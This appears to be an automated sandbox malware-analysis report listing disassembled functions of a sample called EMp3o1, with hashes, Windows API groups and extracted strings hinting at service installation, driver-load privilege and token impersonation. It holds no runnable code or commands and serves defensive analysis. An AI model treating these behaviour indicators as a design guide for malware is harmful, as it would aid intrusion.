                                                • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                • Instruction ID: a88c03ec6f5a3843c6c2ee121b543a86e3ac25708fb450e34b736c60c6a0aca1
                                                • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                • Instruction Fuzzy Hash: 8381BE20F0E2438AFA749B2594712793290AFA57E0F04C435EA0D57793DF3CE865A75C

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                • String ID: WordpadFilter.db
                                                • API String ID: 868324331-3647581008
                                                • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                • Instruction ID: f08704542a4217c303a605d2e4413939a3a346744d1987f2237f607647503f11
                                                • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                • Instruction Fuzzy Hash: 83317C32B1AB4189E710CFA1D8503AD73A5EB99798F148535EE8C13B46EF38D561C788

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                • String ID:
                                                • API String ID: 73155330-0
                                                • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                • Instruction ID: c1c49ef173ecd2a2a18b51c334b48c9e5ad16a05a548edc4b18fc2191291e188
                                                • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                • Instruction Fuzzy Hash: 48815E22B1A78245E6218B359410179B694FF66BE4F14C335EF5953793DF3CE0A1934C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                • String ID:
                                                • API String ID: 3526400053-0
                                                • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                • API String ID: 3408796845-4213300970
                                                • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                • String ID: ampStopSingletone: logging ended
                                                • API String ID: 2048888615-3533855269
                                                • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ErrorLastManagerOpen$FileModuleName
                                                • String ID: /remove$/service$vseamps
                                                • API String ID: 67513587-3839141145
                                                • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                APIs
                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                  • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressProc$Load$Library
                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                • API String ID: 3981747205-232180764
                                                • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                • String ID:
                                                • API String ID: 4284112124-0
                                                • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                • String ID: vseamps
                                                • API String ID: 3693165506-3944098904
                                                • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: FileModuleName
                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                • API String ID: 514040917-4022980321
                                                • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                • String ID:
                                                • API String ID: 2057259594-0
                                                • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                • String ID:
                                                • API String ID: 3103264659-0
                                                • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                • Instruction ID: f1c933509e1f8cdddf8f4145be2bea6528d4af4c1eff3bce56930e1798c00c8f
                                                • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                • Instruction Fuzzy Hash: 8D31747270AB818AEB608F60E8503ED7365FB94794F44403ADA4E47B9ADF3CD568C718
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 1269745586-0
                                                • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                • Instruction ID: 5f09794681e17309a01d33d532f5fbd7733a4d4469f5c5be62c47ac91716394e
                                                • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                • Instruction Fuzzy Hash: 0A318232709B818ADB60CF24E8503AE73A4FB887A4F504535EA8D43B5ADF3CC165CB08
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                • String ID:
                                                • API String ID: 1445889803-0
                                                • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                APIs
                                                • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContext
                                                • String ID:
                                                • API String ID: 2202868296-0
                                                • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                Similarity
                                                • API ID: ExceptionRaise_clrfp
                                                • String ID:
                                                • API String ID: 15204871-0
                                                • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                • Instruction ID: 0ef66192a08c96f70334001e251273d1a2624dcc2c0a5d00edda494235d47d44
                                                • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                • Instruction Fuzzy Hash: 35B15A73605B898BEB15CF29C89636C3BA0F748B9CF148921DB5D837A5CB39D461D708
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide
                                                • String ID:
                                                • API String ID: 203985260-0
                                                • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                • Instruction ID: b0c536d0d63251921301f6c9a719d4ada1723f3455c9473d39280d2c5cb17aef
                                                • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                • Instruction Fuzzy Hash: 6651D622B0978185EB309B71A8542AE7BA4FB40BE4F148134EE5C27B9ADF3CD421D70C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID: EntryFunctionLookup
                                                • String ID:
                                                • API String ID: 3852435196-0
                                                • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
